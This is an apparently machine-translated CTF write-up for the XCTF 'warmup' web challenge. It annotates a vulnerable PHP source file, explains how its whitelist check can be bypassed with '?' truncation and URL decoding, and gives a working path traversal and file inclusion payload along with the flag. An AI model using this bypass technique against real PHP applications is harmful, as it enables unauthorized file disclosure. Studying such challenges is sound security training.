View page source code , Find out source.php

  Get into source.php, Find the source code

Code audit , analysis

 <?php
    highlight_file(__FILE__); // The highlighted 
    class emmm // Define a class 
    {
        public static function checkFile(&$page)// Check function 
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];// Define a white list 
            if (! isset($page) || !is_string($page)) {   // The variable does not exist or is not a string , Enter a string to bypass 
                echo "you can't see it";// Print you can't view this 
                return false;// return false
            }

            if (in_array($page, $whitelist)) { // Does it exist in $whitelist, Existence can bypass 
                return true;// return ture
            }

            $_page = mb_substr( // Intercepting string 
                $page,
                0,
                mb_strpos($page . '?', '?') // Intercept $page in ? The part before the first appearance 
            );
            if (in_array($_page, $whitelist)) {// Whether this part exists in $whitelist Array , Is to return ture, Guaranteed interception ？ Before that was source perhaps hint perhaps source.php perhaps hint.php, You can bypass 
                return true;
            }

            $_page = urldecode($page); //url Decrypt 
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?') // Intercept $page in ? The part before the first appearance 
            );
            if (in_array($_page, $whitelist)) {// The same as above can bypass 
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])   // The input is not empty , be ture
        && is_string($_REQUEST['file']) // The input is a string 
        && emmm::checkFile($_REQUEST['file'])// Execute the check function 
    ) {
        include $_REQUEST['file'];// The execution file contains 
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";// Print pictures 
    }  
?> 

Find out hint.php file , The interview told flag The location of  

Obviously, we want to execute the file containing flag, The conditions contained in the file should meet the last if,

if (! empty($_REQUEST['file'])   // The input is not empty , be ture
    && is_string($_REQUEST['file']) // The input is a string
    && emmm::checkFile($_REQUEST['file'])// Execute the check function

The first two are very satisfying , Just enter a string , Now analyze the last conditional check function , Bypass I have written the code

Here we only know the file name but not the path , Look up Information

Here we just ../ Enough to find , Usually write five or six , Can't find another

 

structure payload：?file=source.php?/../../../../../../ffffllllaaaagggg

http://xxx.xxx.xxx/source.php?file=source.php?/../../../../../../ffffllllaaaagggg

Pay attention here , The first question mark is used to pass parameters , It can be like this payload（source.php It can also be changed to hint.php）

http://xxx.xxx.xxx/?file=source.php?/../../../../../../ffffllllaaaagggg

Bring in to get flag:flag{25e7bce6005c4e0c983fb97297ac6e5a} 

 

  Refer to the connection ：(40 Bar message ) 【XCTF Master advanced area 】 web7_warmup writeup（ One ）_Mitch311 The blog of -CSDN Blog